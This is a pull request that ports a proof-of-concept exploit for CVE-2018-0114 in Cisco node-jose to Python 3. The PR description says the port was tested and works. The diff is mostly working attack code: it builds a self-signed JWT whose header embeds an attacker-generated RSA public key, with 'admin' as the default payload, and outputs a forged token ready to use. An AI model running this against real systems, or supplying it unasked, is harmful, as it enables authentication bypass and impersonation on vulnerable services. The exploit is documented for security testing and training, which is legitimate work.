### PR TITLE
Support for python3  [enhancement]

### DIFF
--- a/jwk-node-jose.py
+++ b/jwk-node-jose.py
@@ -1,5 +1,7 @@
+#!/usr/bin/env python3
+
 import base64
-import urllib
+from urllib.parse import quote_plus
 import rsa
 import sys
 
@@ -7,6 +9,8 @@ import sys
 
 '''
 POC of CVE-2018-0114 Cisco node-jose <0.11.0
+Example: python3 44324.py "mypayload" 512  
+Exploitdb: https://www.exploit-db.com/exploits/44324 
 
 Created by Andrea Cappa aka @zi0Black (GitHub,Twitter,Telegram)
 
@@ -20,58 +24,56 @@ Site: https://pentesterlab.com
 
 '''
 
-def generate_key (key_size):
+def generate_key(key_size):
     #create rsa priv & public key
     print ("[+]Creating-RSA-pair-key")
-    (public_key,private_key)=rsa.newkeys(key_size,poolsize=8)
+    (public_key,private_key) = rsa.newkeys(key_size,poolsize=8)
     print ("\t[+]Pair-key-created")
     return private_key, public_key
 
-def to_bytes(n, length, endianess='big'):
-    h = '%x' % n
-    s = ('0'*(len(h) % 2) + h).zfill(length*2).decode('hex')
-    return s if endianess == 'big' else s[::-1]
+def pack_bigint(i):
+    b = bytearray()
+    while i:
+        b.append(i & 0xFF)
+        i >>= 8
+    return b[::-1]
 
 def generate_header_payload(payload,pubkey):
     #create header and payload
     print ("[+]Assembling-the-header-and-the-payload")
-    xn = pubkey.n
-    xe = pubkey.e
-    n=base64.urlsafe_b64encode(to_bytes(xn,sys.getsizeof(xn),'big'))
-    e=base64.urlsafe_b64encode(to_bytes(xe,sys.getsizeof(xe),'big'))
-    headerAndPayload = base64.b64encode('{"alg":"RS256",'
+    n=base64.urlsafe_b64encode(pack_bigint(pubkey.n)).decode('utf-8').rstrip('=')
+    e=base64.urlsafe_b64encode(pack_bigint(pubkey.e)).decode('utf-8').rstrip('=')
+    headerAndPayload = base64.b64encode(('{"alg":"RS256",'
                                         '"jwk":{"kty":"RSA",'
                                         '"kid":"topo.gigio@hackerzzzz.own",'
                                         '"use":"sig",'
                                         '"n":"'+n+'",'
-                                        '"e":"'+e+'"}}')
-    headerAndPayload=headerAndPayload+"."+base64.b64encode(payload)
-    headerAndPayload = headerAndPayload.encode('utf-8').replace("=","")
+                                        '"e":"'+e+'"}}').encode())
+    headerAndPayload = headerAndPayload+b"."+base64.b64encode(payload)
+    headerAndPayload = headerAndPayload
     print ("\t[+]Assembed")
     return headerAndPayload
 
-def generate_signature (firstpart,privkey):
+def generate_signature(firstpart,privkey):
     #create signature
     signature = rsa.sign(firstpart,privkey,'SHA-256')
-    signatureEnc = base64.b64encode(signature).encode('utf-8').replace("=", "")
+    signatureEnc = base64.b64encode(signature)
     print ("[+]Signature-created")
     return signatureEnc
 
 def create_token(headerAndPayload,sign):
     print ("[+]Forging-of-the-token\n\n")
-    token = headerAndPayload+"."+sign
-    token = urllib.quote_plus(token)
+    token = (headerAndPayload+b"."+sign).decode('utf-8').rstrip('=')
+    token = quote_plus(token)
     return token
 
-
 if(len(sys.argv)>0):
-    payload = str(sys.argv[1])
+    payload = bytes(str(sys.argv[1]).encode('ascii'))
     key_size = int(sys.argv[2])
-     if(key_size<512):
-        print("Key size too small")
-        exit()
 else:
-    payload = 'somthings'
+    payload = b'admin'
+    key_size = int(512)
+
 
 banner="""
    _____  __      __  ______            ___     ___    __    ___              ___    __   __   _  _   


### PR DESCRIPTION
Hi. I have added support for python3. Here are a few things:

* `urllib.parse` instead of `urllib`
* `base64.b64encode` only accepts bytes data in python3
*  New function for converting `n` and `e` into bytes data for base64 conversion, since python3 doesn't support `.decode('hex')` as was used originally
* Using `rstrip()` instead of `replace()` cz it makes sense.
* Also when I tried this script It didn't work for python2 as well because of no `int` conversion of supplied `keysize`, fixed that too! 
* I have made a PR to the exploitdb repo as well.
* Tested multiple times, it works!